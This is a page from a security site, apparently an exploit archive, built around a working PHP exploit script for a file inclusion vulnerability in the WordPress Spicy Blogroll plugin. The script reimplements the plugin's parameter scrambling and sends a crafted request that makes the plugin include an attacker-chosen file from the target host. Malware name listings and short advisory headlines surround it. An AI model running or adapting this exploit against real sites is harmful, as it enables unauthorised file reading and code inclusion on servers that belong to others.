The goal of this project is to make virtual world a safer and better place without child pornography, major computer crime and RIAA.
Login As
You can log in if you are registered at one of these services:
Security Bulletins
Latest Malware Updates

Infostealer.Posteal

02/26/2015

Downloader.Busadom

02/26/2015

Trojan.Ladocosm

02/26/2015

SONAR.SuspDocRun

02/25/2015

SONAR.SuspHelpRun

02/25/2015
07/13/2013

Wordpress Spicy Blogroll Plugin - File Inclusion Vulnerability

<?php
// Title: Wordpress Plugin Spicy Blogroll File Inclusion Vulnerability
// Date: 12-07-2013 (GMT+8 Kuala Lumpur)
// Author: Ahlspiess
// Greetz: All TBDIAN - http://w3.tbd.my :)
// Screenshot: http://i.imgur.com/jIrUznC.png
/**
Details:
    File: /wp-content/plugins/spicy-blogroll-ajax.php
    SVN Source: http://svn.wp-plugins.org/spicy-blogroll/trunk/spicy-blogroll-ajax.php
<?php
...
...
    $link_url = $_GET['link_url'];
    $link_text = $_GET['link_text'];
    $var2 = unscramble($_GET['var2']);
    $var3 = unscramble($_GET['var3']);
    $var4 = unscramble($_GET['var4']);
    $var5 = unscramble($_GET['var5']);
    $nonce = unscramble($_GET['var11']);
    require_once($var2.$var4); <-- Boom
...
...
*/

if(!isset($argv[3])) {
    die(sprintf("php %s <host> <path> <file>\n", $argv[0]));
}

list(,$host, $path, $file) = $argv;
$vfile = 'http://%s%s/wp-content/plugins/spicy-blogroll/spicy-blogroll-ajax.php?var2=%s&;var4=%s';
$request = sprintf($vfile, $host, $path, scramble(dirname($file) . "/"), scramble(basename($file)));
$opts = array(
    'http'=>array(
        'header'        =>    "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0",
        'ignore_errors'    =>    true,
    )
);

$context = stream_context_create($opts);
echo file_get_contents($request, 0, $context);

/**
    Source: http://svn.wp-plugins.org/spicy-blogroll/trunk/spicy-blogroll.php
    Line: 386-401
*/
function scramble($text1,$rng = 1){
    $len=strlen($text1);
    $rn=$rng%2;
    $count=7;
    $seed=($rn%=2)+1;
    $text2=chr($seed+64+$rng).chr($rng+70);
    for($i=0; $i<=$len-1; $i++) {
        $seed*=-1;
        $count+=1;
        $ch=ord(substr($text1,$i,1))+$seed;
        if($ch==92){$ch.=42;}
        $text2.=chr($ch);
    if($count%5==$rn){$text2.=chr(mt_rand(97,123));}
    }
    return $text2;
}

?>

Security Advisories Database

Remote Code Execution Vulnerability in Microsoft OpenType Font Driver

A remote attacker can execute arbitrary code on the target system.

07/21/2015

SQL Injection Vulnerability in Piwigo

SQL inection vulnerability has been discovered in Piwigo.

02/05/2015

Cross-site Scripting Vulnerability in DotNetNuke

A cross-site scripting (XSS) vulnerability has been discovered in DotNetNuke.

02/05/2015

Cross-site Scripting Vulnerability in Hitachi Command Suite

A cross-site scripting vulnerability was found in Hitachi Command Suite.

02/02/2015

Denial of service vulnerability in FreeBSD SCTP RE_CONFIG Chunk Handling

An attacker can perform a denial of service attack.

01/30/2015

Denial of service vulnerability in Apache Traffic Server HTTP TRACE Max-Forwards

An attacker can perform a denial of service attack.

01/30/2015

Denial of service vulnerability in MalwareBytes Anti-Exploit &quot;mbae.sys&quot;

An attacker can perform a denial of service attack.

01/30/2015

Denial of service vulnerability in Linux Kernel splice

An attacker can perform a denial of service attack.

01/29/2015

Denial of service vulnerability in Python Pillow Module PNG Text Chunks Decompression

An attacker can perform a denial of service attack.

01/20/2015